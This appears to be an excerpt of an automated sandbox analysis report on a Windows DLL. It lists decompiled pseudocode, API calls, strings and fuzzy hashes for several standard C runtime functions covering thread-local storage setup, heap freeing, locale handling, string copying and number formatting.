0x100044aa
0x100044b7
0x100044bc
0x100044c1
0x100044c3
0x1000452a
0x1000452a
0x00000000
0x100044c5
0x100044c5
0x100044d6
0x100044d8
0x100044db
0x100044e0
0x00000000
0x100044e2
0x100044ee
0x100044f0
0x100044f4
0x00000000
0x100044f6
0x100044f6
0x100044f7
0x1000450b
0x1000450d
0x00000000
0x1000450f
0x1000450f
0x10004511
0x10004512
0x10004519
0x1000451f
0x10004523
0x10004527
0x10004527
0x1000450d
0x100044f4
0x100044e0
0x100044c3
0x1000446e
0x10004533
0x100043c2
0x100043c2
0x100043ca
0x100043ca

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10002B72,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 100043B6
__mtterm.LIBCMT ref: 100043C2

Part of subcall function 1000409A: __decode_pointer.LIBCMT ref: 100040AB
Part of subcall function 1000409A: TlsFree.KERNEL32(00000019,10002C0E,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 100040C5
Part of subcall function 1000409A: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10002C0E,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C), ref: 1000512A
Part of subcall function 1000409A: DeleteCriticalSection.KERNEL32(00000019,?,00000001,10002C0E,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C), ref: 10005154

GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 100043D8
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 100043E5
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 100043F2
GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 100043FF
TlsAlloc.KERNEL32(?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 1000444F
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 1000446A
__init_pointers.LIBCMT ref: 10004474
__encode_pointer.LIBCMT ref: 1000447F
__encode_pointer.LIBCMT ref: 1000448F
__encode_pointer.LIBCMT ref: 1000449F
__encode_pointer.LIBCMT ref: 100044AF
__decode_pointer.LIBCMT ref: 100044D0
__calloc_crt.LIBCMT ref: 100044E9
__decode_pointer.LIBCMT ref: 10004503
GetCurrentThreadId.KERNEL32 ref: 10004519

Strings

FlsFree, xrefs: 100043F4
KERNEL32.DLL, xrefs: 100043B1
FlsSetValue, xrefs: 100043E7
FlsAlloc, xrefs: 100043D2
FlsGetValue, xrefs: 100043DA

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 4287529916-3819984048
Opcode ID: fa2fffed4c2e602b152b41421b1bf291c4d2d771b38b5e8f304c4b3fb3702998
Instruction ID: 49a6c37e4ad69ce3b281a58929c39eebd0e215f1f1571eb8de2fd9ed8cd4a811
Opcode Fuzzy Hash: fa2fffed4c2e602b152b41421b1bf291c4d2d771b38b5e8f304c4b3fb3702998
Instruction Fuzzy Hash: F131D3B1990B21DAF701EF349CC5A093BA1EF082D3F468226F540AA5A5DFB6D540CB96

Uniqueness

Uniqueness Score: -1.00%

Function 100040D7, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100040D7(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t20;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t39;
				void* _t40;

				_push(0xc);
				_push(0x10012990);
				E10005D6C(__ebx, __edi, __esi);
				_t20 = GetModuleHandleA("KERNEL32.DLL");
				 *(_t40 - 0x1c) = _t20;
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x100144e8;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				if(_t20 != 0) {
					 *((intOrPtr*)(_t39 + 0x1f8)) = GetProcAddress(_t20, "EncodePointer");
					 *((intOrPtr*)(_t39 + 0x1fc)) = GetProcAddress( *(_t40 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x10014570;
				InterlockedIncrement(0x10014570);
				E1000523C(0xc);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t24 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t24;
				if(_t24 == 0) {
					_t28 =  *0x10014b78; // 0x10014aa0
					 *((intOrPtr*)(_t39 + 0x6c)) = _t28;
				}
				_push( *((intOrPtr*)(_t39 + 0x6c)));
				E1000881C();
				 *(_t40 - 4) = 0xfffffffe;
				return E10005DB1(E10004182());
			}

0x100040d7
0x100040d9
0x100040de
0x100040e8
0x100040ee
0x100040f1
0x100040f4
0x100040fe
0x10004103
0x10004113
0x10004123
0x10004123
0x10004129
0x1000412c
0x10004133
0x1000413f
0x10004143
0x1000414b
0x10004151
0x10004155
0x10004158
0x1000415d
0x1000415f
0x10004164
0x10004164
0x10004167
0x1000416a
0x10004170
0x10004181

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,10012990,0000000C,100041E9,00000000,00000000), ref: 100040E8
GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10004111
GetProcAddress.KERNEL32(?,DecodePointer), ref: 10004121
InterlockedIncrement.KERNEL32(10014570), ref: 10004143
__lock.LIBCMT ref: 1000414B
___addlocaleref.LIBCMT ref: 1000416A

Strings

KERNEL32.DLL, xrefs: 100040E3
EncodePointer, xrefs: 10004105
DecodePointer, xrefs: 10004119

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1036688887-2843748187
Opcode ID: a3f9aaf7cb2d739208cb6f335bcdd225b98e2a72c0e77852e0aea113f93d5998
Instruction ID: ec63c433ce3c8b30278a628037541ba983738ea98bbe10110da0dd76b5bb6676
Opcode Fuzzy Hash: a3f9aaf7cb2d739208cb6f335bcdd225b98e2a72c0e77852e0aea113f93d5998
Instruction Fuzzy Hash: F41148B49007019FE720CF698884B9ABBE4EF04354F11851EE5999B2A0CBB9E980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000462B, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E1000462B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x100129d8);
				_t8 = E10005D6C(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10005DB1(_t8);
				}
				if( *0x10017614 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x10015b94, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000499F(_t31);
						 *_t10 = E10004964(GetLastError());
					}
					goto L9;
				}
				E1000523C(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E100052B5(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E100052E0();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E10004681();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x1000462b
0x1000462d
0x10004632
0x10004637
0x1000463c
0x100046b3
0x100046b8
0x100046b8
0x10004645
0x1000468a
0x1000468b
0x10004693
0x10004699
0x1000469b
0x1000469d
0x100046b0
0x100046b2
0x00000000
0x1000469b
0x10004649
0x1000464f
0x10004654
0x1000465a
0x1000465f
0x10004661
0x10004662
0x10004663
0x10004669
0x1000466a
0x10004671
0x1000467a
0x00000000
0x1000467c
0x1000467c
0x00000000
0x1000467c

APIs

__lock.LIBCMT ref: 10004649

Part of subcall function 1000523C: __mtinitlocknum.LIBCMT ref: 10005250
Part of subcall function 1000523C: __amsg_exit.LIBCMT ref: 1000525C
Part of subcall function 1000523C: EnterCriticalSection.KERNEL32(?,?,?,1000AB65,00000004,10012D38,0000000C,1000763F,00000000,00000000,00000000,00000000,00000000,100041C0,00000001,00000214), ref: 10005264

___sbh_find_block.LIBCMT ref: 10004654
___sbh_free_block.LIBCMT ref: 10004663
HeapFree.KERNEL32(00000000,00000001,100129D8), ref: 10004693
GetLastError.KERNEL32(?,1000AB65,00000004,10012D38,0000000C,1000763F,00000000,00000000,00000000,00000000,00000000,100041C0,00000001,00000214), ref: 100046A4

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 6e3b0dc400aba61811a0b789bdd6a2251b9312ca6b6edcb45f624c1a58b18515
Instruction ID: de06b8eee97f45080cdfd64b2b7fdbcf6614b9d1e8be739ae9aea6f356c1b997
Opcode Fuzzy Hash: 6e3b0dc400aba61811a0b789bdd6a2251b9312ca6b6edcb45f624c1a58b18515
Instruction Fuzzy Hash: 76018BB5905215AAFB20DFB09C0A74F37A4EF027D1F13411AF444AA199DF36D981CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 10003954, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E10003954() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x10010248;
					_v28 =  *0x10010240;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x10003959
0x10003961
0x10003978
0x10003924
0x1000392d
0x10003939
0x1000393c
0x1000393f
0x10003941
0x10003944
0x10003949
0x10003953
0x1000394b
0x1000394f
0x1000394f
0x10003963
0x10003969
0x10003971
0x00000000
0x10003973
0x10003973
0x10003977
0x10003977
0x10003971

APIs

GetModuleHandleA.KERNEL32(KERNEL32,10001D5C), ref: 10003959
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10003969

Strings

IsProcessorFeaturePresent, xrefs: 10003963
KERNEL32, xrefs: 10003954

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: a73185cf8db82405cc2982e992356da18149e8b734ade426e021f390aa4a79c6
Instruction ID: c287098c737c61cd78190a81faa6bdf7774ee10209fcc25c9c855ac827e3b872
Opcode Fuzzy Hash: a73185cf8db82405cc2982e992356da18149e8b734ade426e021f390aa4a79c6
Instruction Fuzzy Hash: A2F03030A0491DE2EB01ABB1AD4E6AF7B78FB80782F824590E5C1F0098DFB1C0B0C351

Uniqueness

Uniqueness Score: -1.00%

Function 100014E0, Relevance: 6.1, APIs: 4, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100014E0(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t32;
				void* _t47;
				intOrPtr _t48;
				signed int _t50;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t60;
				signed int _t61;
				intOrPtr _t62;
				void* _t65;
				intOrPtr _t74;

				_t50 = __ecx;
				_t62 =  *((intOrPtr*)(_t65 + 0xc));
				_t58 =  *((intOrPtr*)(_t65 + 0x18));
				_t67 =  *((intOrPtr*)(_t62 + 0x14)) - _t58;
				_t61 = __ecx;
				if( *((intOrPtr*)(_t62 + 0x14)) < _t58) {
					E1000F255(_t47, _t58, __ecx, _t67);
				}
				_t48 =  *((intOrPtr*)(_t65 + 0x1c));
				_t28 =  *((intOrPtr*)(_t62 + 0x14)) - _t58;
				if(_t28 < _t48) {
					_t48 = _t28;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				if((_t50 | 0xffffffff) - _t29 <= _t48) {
					L6:
					E1000F1C4(_t48, _t56, _t58, _t61, _t70);
				} else {
					_t56 = _t29 + _t48;
					_t70 = _t29 + _t48 - _t29;
					if(_t29 + _t48 < _t29) {
						goto L6;
					}
				}
				if(_t48 <= 0) {
					L26:
					return _t61;
				} else {
					_t60 =  *((intOrPtr*)(_t61 + 0x14)) + _t48;
					_t72 = _t60 - 0xfffffffe;
					if(_t60 > 0xfffffffe) {
						E1000F1C4(_t48, _t56, _t60, _t61, _t72);
					}
					_t32 =  *((intOrPtr*)(_t61 + 0x18));
					if(_t32 >= _t60) {
						__eflags = _t60;
						if(_t60 != 0) {
							goto L12;
						} else {
							__eflags = _t32 - 0x10;
							 *((intOrPtr*)(_t61 + 0x14)) = _t60;
							if(_t32 < 0x10) {
								 *((char*)(_t61 + 4)) = 0;
								return _t61;
							} else {
								 *((char*)( *((intOrPtr*)(_t61 + 4)))) = 0;
								return _t61;
							}
						}
					} else {
						E10001360(_t61, _t60,  *((intOrPtr*)(_t61 + 0x14)));
						_t74 = _t60;
						L12:
						if(_t74 <= 0) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t62 + 0x18)) < 0x10) {
								_t63 = _t62 + 4;
								__eflags = _t62 + 4;
							} else {
								_t63 =  *((intOrPtr*)(_t62 + 4));
							}
							_t33 =  *((intOrPtr*)(_t61 + 0x18));
							if( *((intOrPtr*)(_t61 + 0x18)) < 0x10) {
								_t57 = _t61 + 4;
							} else {
								_t57 =  *((intOrPtr*)(_t61 + 4));
							}
							E100020A3( *((intOrPtr*)(_t65 + 0x1c)),  *((intOrPtr*)(_t61 + 0x14)) + _t57, _t57,  *((intOrPtr*)(_t61 + 0x14)) + _t57, _t33 -  *((intOrPtr*)(_t61 + 0x14)), _t63 +  *((intOrPtr*)(_t65 + 0x1c)), _t48);
							 *((intOrPtr*)(_t61 + 0x14)) = _t60;
							if( *((intOrPtr*)(_t61 + 0x18)) < 0x10) {
								 *((char*)(_t61 + 4 + _t60)) = 0;
								goto L26;
							} else {
								 *((char*)( *((intOrPtr*)(_t61 + 4)) + _t60)) = 0;
								return _t61;
							}
						}
					}
				}
			}

0x100014e0
0x100014e2
0x100014e8
0x100014ec
0x100014ef
0x100014f1
0x100014f3
0x100014f3
0x100014fb
0x100014ff
0x10001503
0x10001505
0x10001505
0x10001507
0x10001511
0x1000151a
0x1000151a
0x10001513
0x10001513
0x10001516
0x10001518
0x00000000
0x00000000
0x10001518
0x10001521
0x100015d3
0x100015d8
0x10001527
0x1000152a
0x1000152c
0x1000152f
0x10001531
0x10001531
0x10001536
0x1000153b
0x1000155c
0x1000155e
0x00000000
0x10001560
0x10001560
0x10001563
0x10001566
0x1000157b
0x10001583
0x10001568
0x1000156c
0x10001574
0x10001574
0x10001566
0x1000153d
0x10001544
0x10001549
0x1000154b
0x1000154b
0x00000000
0x10001551
0x10001555
0x10001586
0x10001586
0x10001557
0x10001557
0x10001557
0x10001589
0x1000158f
0x10001596
0x10001591
0x10001591
0x10001591
0x100015aa
0x100015b6
0x100015b9
0x100015ce
0x00000000
0x100015bb
0x100015be
0x100015c8
0x100015c8
0x100015b9
0x1000154b
0x1000153b

APIs

std::_String_base::_Xlen.LIBCPMT ref: 100014F3

Part of subcall function 1000F255: __EH_prolog3.LIBCMT ref: 1000F25C
Part of subcall function 1000F255: std::runtime_error::runtime_error.LIBCPMT ref: 1000F279
Part of subcall function 1000F255: __CxxThrowException@8.LIBCMT ref: 1000F28E

std::_String_base::_Xlen.LIBCPMT ref: 1000151A
std::_String_base::_Xlen.LIBCPMT ref: 10001531
_memcpy_s.LIBCMT ref: 100015AA

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: String_base::_Xlenstd::_$Exception@8H_prolog3Throw_memcpy_sstd::runtime_error::runtime_error
String ID:
API String ID: 1039763836-0
Opcode ID: 3bc36b0b3ebad1f88ff8b80fef578884bdee7dbf920323cc644c00c4c834b7cf
Instruction ID: 7e8e6ad3b686ebbc1e7c317c0f6e3693ef752202c0702f30b8b169fa01858b9a
Opcode Fuzzy Hash: 3bc36b0b3ebad1f88ff8b80fef578884bdee7dbf920323cc644c00c4c834b7cf
Instruction Fuzzy Hash: CE31D232300B01CBE720CE5CED80A9AF3E9DBD16A2B10492EE593CB655D771F80487A1

Uniqueness

Uniqueness Score: -1.00%

Function 1000DEFB, Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DEFB(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				void* __ebx;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t71;

				_t71 = _a8;
				if(_t71 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t71 != 0) {
						E10002DA0(0,  &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1000A519( *_t71 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t71, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000499F(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t71[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t57 =  *(_t56 + 0xac);
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t71, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t71 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x1000df03
0x1000df0a
0x1000df1f
0x00000000
0x1000df11
0x1000df13
0x1000df2b
0x1000df30
0x1000df33
0x1000df36
0x1000df5f
0x1000df64
0x1000df68
0x1000dfe9
0x1000e004
0x1000e006
0x1000df46
0x1000df46
0x1000df49
0x1000df4b
0x1000df4e
0x1000df4e
0x1000df4e
0x1000df4e
0x00000000
0x1000df54
0x1000dfc8
0x1000dfc8
0x1000dfcd
0x1000dfd3
0x1000dfd6
0x1000dfd8
0x1000dfdb
0x1000dfdb
0x1000dfdb
0x1000dfdb
0x00000000
0x1000dfdf
0x1000df6a
0x1000df6d
0x1000df73
0x1000df76
0x1000df9d
0x1000dfa0
0x1000dfa6
0x00000000
0x00000000
0x1000dfa8
0x1000dfab
0x00000000
0x00000000
0x1000dfad
0x1000dfad
0x1000dfb0
0x1000dfb6
0x1000df24
0x1000df24
0x1000dfbf
0x00000000
0x1000dfbf
0x1000df78
0x1000df7b
0x00000000
0x00000000
0x1000df7f
0x1000df90
0x1000df96
0x1000df98
0x1000df9b
0x00000000
0x00000000
0x00000000
0x1000df9b
0x1000df38
0x1000df3b
0x1000df3d
0x1000df43
0x1000df43
0x00000000
0x1000df15
0x1000df15
0x1000df1a
0x1000df1c
0x1000df1c
0x00000000
0x1000df1a
0x1000df13

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000DF2B
__isleadbyte_l.LIBCMT ref: 1000DF5F
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?), ref: 1000DF90
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?), ref: 1000DFFE

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 48c2d18df693e976f2e63d174e8970321c04c157c0247a8c618096189b4a5a77
Instruction ID: 52d36080a4333043f0da4a526a2f2ada4f68e39f8df1c2f3b1e2093108c56564
Opcode Fuzzy Hash: 48c2d18df693e976f2e63d174e8970321c04c157c0247a8c618096189b4a5a77
Instruction Fuzzy Hash: 49319031A00247EFEB10EFA4C884ABE7BA5FF01391F11C57AF4668B199D3309940DB61

Uniqueness

Uniqueness Score: -1.00%

Function 10003829, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003829(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10003126(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10003212(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E10003731(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E10003678(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x10003829
0x1000382c
0x10003832
0x100038a5
0x00000000
0x10003839
0x10003839
0x1000383c
0x10003857
0x1000385a
0x1000387a
0x1000388c
0x1000385c
0x1000385c
0x1000385f
0x00000000
0x10003861
0x10003873
0x10003873
0x1000385f
0x100038aa
0x100038ae
0x1000383e
0x10003856
0x10003856
0x1000383c

APIs

__cftof_l.LIBCMT ref: 1000384D

Part of subcall function 10003678: __fltout2.LIBCMT ref: 100036A2

__cftog_l.LIBCMT ref: 10003873
__cftoe_l.LIBCMT ref: 100038A5

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 0b60c728e066a34534985914ae2100d739bb96f240950f774e101ce542f25b0d
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 1D018C7640424ABBEF139E80CC418EE3F6AFB18280B54C465FE1958138C63AD9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000825B, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000825B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10012c18);
				E10005D6C(__ebx, __edi, __esi);
				_t31 = E1000420E(__edx, __edi, _t35);
				_t15 =  *0x10014a94; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1000523C(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10014998; // 0x1314b0
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10014570;
								if(__eflags != 0) {
									_push(_t33);
									E1000462B(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10014998; // 0x1314b0
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10014998; // 0x1314b0
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100082F6();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E1000608F(_t25, _t29, _t31, 0x20);
				}
				return E10005DB1(_t33);
			}

0x1000825b
0x1000825b
0x1000825b
0x1000825b
0x1000825d
0x10008262
0x1000826c
0x1000826e
0x10008276
0x10008297
0x1000829d
0x100082a1
0x100082a4
0x100082a7
0x100082ad
0x100082af
0x100082b1
0x100082b4
0x100082ba
0x100082bc
0x100082be
0x100082c4
0x100082c6
0x100082c7
0x100082cc
0x100082c4
0x100082bc
0x100082cd
